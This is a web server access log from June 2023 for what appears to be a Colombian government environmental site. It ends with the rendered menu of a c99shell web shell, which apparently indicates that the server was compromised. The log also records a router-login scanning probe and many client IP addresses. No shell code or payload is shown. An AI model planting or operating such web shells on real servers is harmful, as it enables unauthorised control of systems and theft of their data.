18.142.169.161 - - [24/Jun/2023:22:27:36 -0500] "GET /transparencia/financiera/Desagregado%20con%20modificaciones/? HTTP/1.1" 404 1302
179.43.177.244 - - [24/Jun/2023:22:27:46 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [24/Jun/2023:22:26:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57272
201.245.192.253 - - [24/Jun/2023:22:29:47 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42979
201.245.192.253 - - [24/Jun/2023:22:29:50 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43473
205.210.31.162 - - [24/Jun/2023:22:30:57 -0500] "GET / HTTP/1.0" 200 319
216.245.221.92 - - [24/Jun/2023:22:31:20 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Jun/2023:22:32:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40807
172.22.2.4 - - [24/Jun/2023:22:31:30 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Jun/2023:22:32:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 48778
172.22.2.4 - - [24/Jun/2023:22:32:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51193
66.249.70.197 - - [24/Jun/2023:22:34:59 -0500] "-" 408 -
152.202.92.75 - - [24/Jun/2023:22:36:14 -0500] "GET /mesa/contrasena.pdf HTTP/1.1" 200 443199
152.202.92.75 - - [24/Jun/2023:22:36:14 -0500] "GET /mesa/contrasena.pdf HTTP/1.1" 206 1
152.202.92.75 - - [24/Jun/2023:22:36:15 -0500] "GET /mesa/contrasena.pdf HTTP/1.1" 206 403151
216.245.221.92 - - [24/Jun/2023:22:36:20 -0500] "HEAD / HTTP/1.1" 200 -
31.13.115.120 - - [24/Jun/2023:22:36:24 -0500] "GET /acuerdos-de-conservacion-camaras-trampa-registran-fauna-en-la-reserva-umbral-cultural-horizontes.html HTTP/1.1" 200 818
31.13.115.9 - - [24/Jun/2023:22:36:24 -0500] "GET /acuerdos-de-conservacion-camaras-trampa-registran-fauna-en-la-reserva-umbral-cultural-horizontes.html HTTP/1.1" 200 818
172.22.2.4 - - [24/Jun/2023:22:36:29 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
201.245.192.253 - - [24/Jun/2023:22:37:30 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40807
173.252.79.120 - - [24/Jun/2023:22:38:52 -0500] "GET /images/caminatas-ecol\xc3\xb3gicas-marzo---1920x1080_optimized.jpg HTTP/1.1" 404 1034
172.22.2.4 - - [24/Jun/2023:22:37:20 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [24/Jun/2023:22:39:48 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42979
172.22.2.4 - - [24/Jun/2023:22:38:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57272
201.245.192.253 - - [24/Jun/2023:22:39:51 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43473
172.22.2.4 - - [24/Jun/2023:22:40:47 -0500] "GET /BLA/boletinlegal/jurisprudencia.php HTTP/1.1" 200 17583
172.22.2.4 - - [24/Jun/2023:22:41:01 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [24/Jun/2023:22:41:01 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
181.54.228.54 - - [24/Jun/2023:22:41:03 -0500] "GET /BLA/resoluciones/AUTOS%202022/1126.pdf HTTP/1.1" 200 373228
172.22.2.4 - - [24/Jun/2023:22:41:06 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
66.249.70.196 - - [24/Jun/2023:22:41:14 -0500] "-" 408 -
216.245.221.92 - - [24/Jun/2023:22:41:20 -0500] "HEAD / HTTP/1.1" 200 -
168.119.253.69 - - [24/Jun/2023:22:41:32 -0500] "GET / HTTP/1.1" 200 319
168.119.253.69 - - [24/Jun/2023:22:41:33 -0500] "GET / HTTP/1.1" 200 4720
173.252.87.118 - - [24/Jun/2023:22:42:11 -0500] "GET /acuerdos-de-conservacion-camaras-trampa-registran-fauna-en-la-reserva-umbral-cultural-horizontes.html?fbclid=IwAR2Q0wws10QzkeBdlWuh_Gn6bCS1dQCmk3oet7co0xu1WII0WINFpoBeGqU HTTP/1.1" 200 818
201.245.192.253 - - [24/Jun/2023:22:42:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40807
173.252.107.10 - - [24/Jun/2023:22:43:57 -0500] "GET /se-aproxima-nueva-jornada-de-recoleccion-masiva-de-residuos-especiales-y-peligrosos-en-bogota.html HTTP/1.1" 200 1048
172.22.2.4 - - [24/Jun/2023:22:44:26 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisC-035-16.docx HTTP/1.1" 200 25011
172.22.2.4 - - [24/Jun/2023:22:43:10 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Jun/2023:22:44:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56816
186.31.119.134 - - [24/Jun/2023:22:46:06 -0500] "-" 408 -
216.245.221.92 - - [24/Jun/2023:22:46:20 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Jun/2023:22:47:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40807
181.54.148.186 - - [24/Jun/2023:22:49:04 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13502
181.54.148.186 - - [24/Jun/2023:22:49:04 -0500] "GET /BLA/resoluciones/dlf/folder.png HTTP/1.1" 200 410
181.54.148.186 - - [24/Jun/2023:22:49:04 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
181.54.148.186 - - [24/Jun/2023:22:49:14 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2022%2F HTTP/1.1" 200 12235
66.249.66.75 - - [24/Jun/2023:22:50:06 -0500] "-" 408 -
172.22.2.4 - - [24/Jun/2023:22:49:00 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
181.54.148.186 - - [24/Jun/2023:22:50:41 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2022%2F HTTP/1.1" 200 497696
216.245.221.92 - - [24/Jun/2023:22:51:20 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Jun/2023:22:49:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59192
66.249.70.196 - - [24/Jun/2023:22:52:22 -0500] "-" 408 -
201.245.192.253 - - [24/Jun/2023:22:52:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40807
52.167.144.39 - - [24/Jun/2023:22:52:29 -0500] "GET /BLA/resoluciones/AUTOS%202014/5840.pdf HTTP/1.1" 200 465824
186.102.23.125 - - [24/Jun/2023:22:56:18 -0500] "GET /acuerdos-de-conservacion-camaras-trampa-registran-fauna-en-la-reserva-umbral-cultural-horizontes.html?fbclid=IwAR3UHOooMeOikcvRDKEeaUA8rtXGEUDCtfbOxAyajxDHfQM3CrFvkfVjypI HTTP/1.1" 200 818
216.245.221.92 - - [24/Jun/2023:22:56:20 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Jun/2023:22:54:50 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
52.167.144.66 - - [24/Jun/2023:22:56:41 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
172.22.2.4 - - [24/Jun/2023:22:55:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56816
201.245.192.253 - - [24/Jun/2023:22:57:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40807
66.249.70.196 - - [24/Jun/2023:22:58:11 -0500] "-" 408 -
172.22.2.4 - - [24/Jun/2023:22:59:09 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/G__Jurisp.%20Junio%202014_Sent%20Tutela%20Drumond.docx HTTP/1.1" 304 -
216.245.221.92 - - [24/Jun/2023:23:01:20 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Jun/2023:23:00:40 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [24/Jun/2023:23:02:23 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40807
172.22.2.4 - - [24/Jun/2023:23:01:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59192
213.188.80.133 - - [24/Jun/2023:23:03:19 -0500] "GET /acuerdos-de-conservacion-camaras-trampa-registran-fauna-en-la-reserva-umbral-cultural-horizontes.html HTTP/1.1" 200 818
152.39.220.217 - - [24/Jun/2023:23:03:19 -0500] "GET /mas-de-100-arboles-fueron-plantados-en-el-humedal-de-techo.html HTTP/1.1" 200 750
152.39.214.114 - - [24/Jun/2023:23:03:20 -0500] "GET /con-actividades-pedagogicas-y-recreativas-bogota-disfruto-y-conmemoro-la-semana-ambiental.html HTTP/1.1" 200 821
206.204.16.216 - - [24/Jun/2023:23:03:20 -0500] "GET /mas-de-28-toneladas-de-residuos-se-recolectaron-en-la-primera-reciclaton-2023.html HTTP/1.1" 200 726
52.167.144.66 - - [24/Jun/2023:23:03:24 -0500] "GET /BLA/resoluciones/Decretos/Decreto%20597%20de%2019%20de%20octubre%20del%202018.pdf HTTP/1.1" 304 -
52.167.144.39 - - [24/Jun/2023:23:05:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/0483.pdf HTTP/1.1" 200 428703
216.245.221.92 - - [24/Jun/2023:23:06:20 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Jun/2023:23:07:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40807
172.22.2.4 - - [24/Jun/2023:23:06:30 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Jun/2023:23:08:46 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
172.22.2.4 - - [24/Jun/2023:23:08:47 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
172.22.2.4 - - [24/Jun/2023:23:07:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58825
191.156.181.77 - - [24/Jun/2023:23:09:39 -0500] "GET /BLA/resoluciones/dlf/styles.css HTTP/1.1" 200 3049
191.156.181.77 - - [24/Jun/2023:23:09:39 -0500] "GET /BLA/resoluciones/dlf/bg.gif HTTP/1.1" 200 54
191.156.181.77 - - [24/Jun/2023:23:09:39 -0500] "GET /BLA/resoluciones/dlf/folder.png HTTP/1.1" 200 410
191.156.176.175 - - [24/Jun/2023:23:09:30 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13502
191.156.181.77 - - [24/Jun/2023:23:09:40 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
191.156.181.77 - - [24/Jun/2023:23:09:44 -0500] "GET /BLA/resoluciones/dlf/dirup.png HTTP/1.1" 200 644
191.156.181.77 - - [24/Jun/2023:23:09:44 -0500] "GET /BLA/resoluciones/dlf/pdf.gif HTTP/1.1" 200 272
191.156.181.77 - - [24/Jun/2023:23:09:45 -0500] "GET /BLA/resoluciones/dlf/archive.png HTTP/1.1" 200 632
191.156.191.66 - - [24/Jun/2023:23:09:44 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2022%2F HTTP/1.1" 200 497696
18.141.133.124 - - [24/Jun/2023:23:10:39 -0500] "GET /transparencia/financiera/Desagregado%20con%20modificaciones/? HTTP/1.1" 404 1484
172.22.2.4 - - [24/Jun/2023:23:10:54 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=6267&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 1081
172.22.2.4 - - [24/Jun/2023:23:10:55 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
191.156.191.66 - - [24/Jun/2023:23:11:02 -0500] "GET /BLA/resoluciones/AUTOS%202022/6267.pdf HTTP/1.1" 200 528574
216.245.221.92 - - [24/Jun/2023:23:11:20 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Jun/2023:23:12:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40807
46.137.252.107 - - [24/Jun/2023:23:12:24 -0500] "GET /galeria/nivo-slider/demo/convocatorias.html? HTTP/1.1" 200 3464
46.137.252.107 - - [24/Jun/2023:23:12:25 -0500] "GET /galeria/nivo-slider/demo/scripts/jquery-1.7.1.min.js HTTP/1.1" 200 93868
46.137.252.107 - - [24/Jun/2023:23:12:25 -0500] "GET /galeria/nivo-slider/demo/images/bannerconvocatoriaacercar.jpg HTTP/1.1" 200 91528
172.22.2.4 - - [24/Jun/2023:23:12:20 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Jun/2023:23:13:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59192
216.245.221.92 - - [24/Jun/2023:23:16:20 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Jun/2023:23:17:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40807
201.245.192.253 - - [24/Jun/2023:23:19:48 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43140
172.22.2.4 - - [24/Jun/2023:23:18:10 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [24/Jun/2023:23:19:51 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43485
172.22.2.4 - - [24/Jun/2023:23:19:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55337
161.18.112.82 - - [24/Jun/2023:23:20:47 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13502
161.18.112.82 - - [24/Jun/2023:23:20:47 -0500] "GET /BLA/resoluciones/dlf/folder.png HTTP/1.1" 200 410
161.18.112.82 - - [24/Jun/2023:23:20:51 -0500] "GET /BLA/resoluciones/dlf/dirup.png HTTP/1.1" 200 644
161.18.112.82 - - [24/Jun/2023:23:20:51 -0500] "GET /BLA/resoluciones/dlf/pdf.gif HTTP/1.1" 200 272
161.18.112.82 - - [24/Jun/2023:23:20:51 -0500] "GET /BLA/resoluciones/dlf/archive.png HTTP/1.1" 200 632
161.18.112.82 - - [24/Jun/2023:23:20:50 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2022%2F HTTP/1.1" 200 497696
161.18.112.82 - - [24/Jun/2023:23:20:51 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
161.18.112.82 - - [24/Jun/2023:23:21:02 -0500] "GET /BLA/resoluciones/AUTOS%202022/8599.pdf HTTP/1.1" 200 1252770
216.245.221.92 - - [24/Jun/2023:23:21:20 -0500] "HEAD / HTTP/1.1" 200 -
161.18.112.82 - - [24/Jun/2023:23:21:23 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13502
161.18.112.82 - - [24/Jun/2023:23:21:25 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2022%2F HTTP/1.1" 200 497696
66.249.66.78 - - [24/Jun/2023:23:21:40 -0500] "GET /images/conversatorio-ciencia-tecnologia.jpg HTTP/1.1" 200 48122
201.245.192.253 - - [24/Jun/2023:23:22:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40807
66.249.70.198 - - [24/Jun/2023:23:22:28 -0500] "-" 408 -
157.55.39.208 - - [24/Jun/2023:23:25:26 -0500] "GET /images/1%20de%20febrer%20Operativo%20hornos.jpg HTTP/1.1" 200 69569
172.22.2.4 - - [24/Jun/2023:23:24:00 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
161.18.112.82 - - [24/Jun/2023:23:25:42 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13502
161.18.112.82 - - [24/Jun/2023:23:25:42 -0500] "GET /BLA/resoluciones/dlf/styles.css HTTP/1.1" 200 3049
161.18.112.82 - - [24/Jun/2023:23:25:42 -0500] "GET /BLA/resoluciones/dlf/folder.png HTTP/1.1" 200 410
161.18.112.82 - - [24/Jun/2023:23:25:42 -0500] "GET /BLA/resoluciones/dlf/bg.gif HTTP/1.1" 200 54
66.249.66.78 - - [24/Jun/2023:23:26:15 -0500] "GET /favicon.ico HTTP/1.1" 404 1034
216.245.221.92 - - [24/Jun/2023:23:26:20 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Jun/2023:23:24:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52149
201.245.192.253 - - [24/Jun/2023:23:27:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40807
52.167.144.66 - - [24/Jun/2023:23:28:45 -0500] "GET /sipse/faces/presentacion/sistema/anexos/cargarAnexoSolicitudProceso.xhtml HTTP/1.1" 302 -
52.167.144.66 - - [24/Jun/2023:23:28:46 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12179
167.114.173.221 - - [24/Jun/2023:23:28:47 -0500] "GET /auambari-deleito-con-sus-sonidos-ambientales-a-los-asistentes-de-fima-2021.html HTTP/1.1" 200 888
201.245.192.253 - - [24/Jun/2023:23:29:48 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43140
201.245.192.253 - - [24/Jun/2023:23:29:51 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43485
66.249.70.196 - - [24/Jun/2023:23:30:28 -0500] "-" 408 -
216.245.221.92 - - [24/Jun/2023:23:31:20 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Jun/2023:23:29:50 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [24/Jun/2023:23:32:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40807
172.22.2.4 - - [24/Jun/2023:23:30:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56100
172.22.2.4 - - [24/Jun/2023:23:32:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61779
216.245.221.92 - - [24/Jun/2023:23:36:20 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Jun/2023:23:36:36 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [24/Jun/2023:23:36:44 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2010%20del%2026%20de%20Enero%20de%202012.pdf HTTP/1.1" 404 1218
87.121.221.234 - - [24/Jun/2023:23:37:01 -0500] "POST /boaform/admin/formLogin HTTP/1.1" 404 1186
201.245.192.253 - - [24/Jun/2023:23:37:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40807
172.22.2.4 - - [24/Jun/2023:23:35:40 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Jun/2023:23:36:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52149
66.249.70.196 - - [24/Jun/2023:23:38:38 -0500] "-" 408 -
201.245.192.253 - - [24/Jun/2023:23:39:47 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43140
201.245.192.253 - - [24/Jun/2023:23:39:50 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43485
216.245.221.92 - - [24/Jun/2023:23:41:20 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Jun/2023:23:42:13 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40807
172.22.2.4 - - [24/Jun/2023:23:41:30 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Jun/2023:23:42:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59192
157.55.39.208 - - [24/Jun/2023:23:45:58 -0500] "GET /portaldeninos/2021/06/05/celebracion-del-dia-mundial-del-medio-ambiente-comenzo-desde-uno-de-los-pulmones-de-bogota/ HTTP/1.1" 200 104357
216.245.221.92 - - [24/Jun/2023:23:46:20 -0500] "HEAD / HTTP/1.1" 200 -
69.171.231.5 - - [24/Jun/2023:23:46:30 -0500] "GET /images/caminatas-ecol\xc3\xb3gicas-marzo---1920x1080_optimized.jpg HTTP/1.1" 404 1034
181.56.236.210 - - [24/Jun/2023:23:47:07 -0500] "GET /mas-de-100-arboles-fueron-plantados-en-el-humedal-de-techo.html?fbclid=IwAR2U6FDgxpPsEwb-irqMRTignM4sC0jqo7BGL7-vt-n34ikIoLJRmJQLKbw_aem_AdYYPejyN6G9YMT4HAkeKzFBnnS1YAc1CNM5BwlFV2GaAQueGnhg4SeXf7aZSDXVmMU HTTP/1.1" 200 750
201.245.192.253 - - [24/Jun/2023:23:47:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40807
66.249.70.196 - - [24/Jun/2023:23:48:30 -0500] "-" 408 -
162.55.166.12 - - [24/Jun/2023:23:48:54 -0500] "GET / HTTP/1.1" 200 4720
162.55.166.12 - - [24/Jun/2023:23:48:57 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [24/Jun/2023:23:47:20 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
31.13.127.21 - - [24/Jun/2023:23:49:34 -0500] "GET /acuerdos-de-conservacion-camaras-trampa-registran-fauna-en-la-reserva-umbral-cultural-horizontes.html HTTP/1.1" 200 818
31.13.127.22 - - [24/Jun/2023:23:49:34 -0500] "GET /acuerdos-de-conservacion-camaras-trampa-registran-fauna-en-la-reserva-umbral-cultural-horizontes.html HTTP/1.1" 200 818
31.13.127.23 - - [24/Jun/2023:23:49:34 -0500] "GET /acuerdos-de-conservacion-camaras-trampa-registran-fauna-en-la-reserva-umbral-cultural-horizontes.html HTTP/1.1" 200 818
172.22.2.4 - - [24/Jun/2023:23:48:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57272
52.167.144.39 - - [24/Jun/2023:23:50:15 -0500] "GET /BLA/resoluciones/AUTOS%202022/6718.pdf HTTP/1.1" 200 624692
40.77.167.177 - - [24/Jun/2023:23:50:23 -0500] "GET /images/calidaddeaire1.png HTTP/1.1" 200 158614
216.245.221.92 - - [24/Jun/2023:23:51:20 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Jun/2023:23:52:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40807
173.252.87.7 - - [24/Jun/2023:23:53:21 -0500] "GET /techos-verdes-y-jardines-verticales-medida-de-adaptacion-al-cambio-climatico.html HTTP/1.1" 200 744
173.252.87.3 - - [24/Jun/2023:23:53:21 -0500] "GET /techos-verdes-y-jardines-verticales-medida-de-adaptacion-al-cambio-climatico.html HTTP/1.1" 200 744
173.252.87.3 - - [24/Jun/2023:23:53:21 -0500] "GET /techos-verdes-y-jardines-verticales-medida-de-adaptacion-al-cambio-climatico.html HTTP/1.1" 200 744
172.22.2.4 - - [24/Jun/2023:23:53:10 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Jun/2023:23:54:55 -0500] "GET /BLA/boletinlegal/Directivas/2018/Directiva%20No.%2027%20del%2028%20de%20diciembre%20de%202018.pdf HTTP/1.1" 200 2831879
172.22.2.4 - - [24/Jun/2023:23:54:56 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1500
34.223.22.99 - - [24/Jun/2023:23:55:38 -0500] "GET /galeria/galeria/fotos/Humedal-la-conejera4P.jpg HTTP/1.1" 200 33365
172.22.2.4 - - [24/Jun/2023:23:54:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59192
216.245.221.92 - - [24/Jun/2023:23:56:20 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Jun/2023:23:57:11 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40807
66.249.70.196 - - [24/Jun/2023:23:57:57 -0500] "-" 408 -

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0624 ]--